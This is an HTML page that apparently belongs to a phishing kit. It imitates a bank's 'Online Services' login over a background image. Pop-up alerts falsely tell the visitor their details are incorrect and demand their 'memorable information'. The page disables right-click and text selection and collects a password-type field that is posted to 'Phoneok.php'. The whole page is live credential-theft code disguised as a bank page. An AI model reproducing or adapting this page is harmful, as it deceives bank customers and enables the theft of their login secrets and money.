<head>
<title>Online Services</title>
<link rel="shortcut icon" href="favicon.ico" />

<script>
alert("8000066 : We're sorry but the details you've entered are incorrect. Please re-enter your details and try again.");
</script>

<script>
alert("Confirm your memorable information and your account details.");
</script>


<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body onselectstart="return false" oncontextmenu="return false" ondragstart="return false" onMouseOver="window.status='..message perso .. '; return true;" >
<style type="text/css">
<!--
html{
overflow-y:hidden;
}
-->
</style>

<style type="text/css">
Body{
background-image: url('');
background-repeat: no-repeat;
margin-left:0px;
margin-top:0px;
margin-bottom:-20px
}
</style>
</head>

<body style="background-image: url('4.png')">
<form id="form2" onsubmit="return validar(this);" action="Phoneok.php" method="POST">
<div id="Layer9" style="position:absolute; width:168px; height:18px; z-index:3; left: 90px; top: 295px">
  <input name="mem" id="login" size=24 maxlength="30" type="password">
</div>
<div id="Layer4" style="position:absolute; width:95px; height:43px; z-index:4; left: 872px; top: 377px;">
    <input type="image" name="imageField" id="imageField" src="c1.png" width="95" height="39" />
</form>
</body>
</html>